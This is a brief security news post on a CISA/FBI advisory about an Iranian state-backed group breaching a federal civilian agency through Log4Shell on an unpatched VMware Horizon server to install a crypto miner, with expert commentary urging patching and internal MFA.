Iranian APT Pwns FCEB Using Log4Shell

The CISA and the FBI yesterday released a joint advisory warning on an unnamed Iranian Government-Sponsored APT which breached the Federal Civilian Executive Branch (FCEB) organization to deploy XMRig crypto mining malware. This was done by compromising the federal network after hacking into an unpatched VMware Horizon server using an exploit targeting the Log4Shell remote code execution vulnerability.

Yaron Kassner, CTO and Co-Founder, Silverfort had this to say:

     “The alert from CISA is evidence of the unfortunate legacy we were warned to expect from Log4Shell at the time of its discovery. It is a gift to state actors and access brokers and this attack is proof of the impact critical vulnerabilities such as this can have when left unpatched .“As we see here, once a toehold is gained – attackers are then able to simply pick up administrator credentials and use them to move laterally, before eventually compromising the entire domain.”

“This emphasizes the need for MFA inside the network, which was clearly missing here. Hopefully, crypto-mining was the sole outcome of this attack and not more than that.”

The take home message is that if you haven’t got your exposure to the Log4Shell vulnerability under control, you will get pwned. Thus you should get about making sure that you’re not the next victim of some threat actor taking advantage of Log4Shell.

Leave a Reply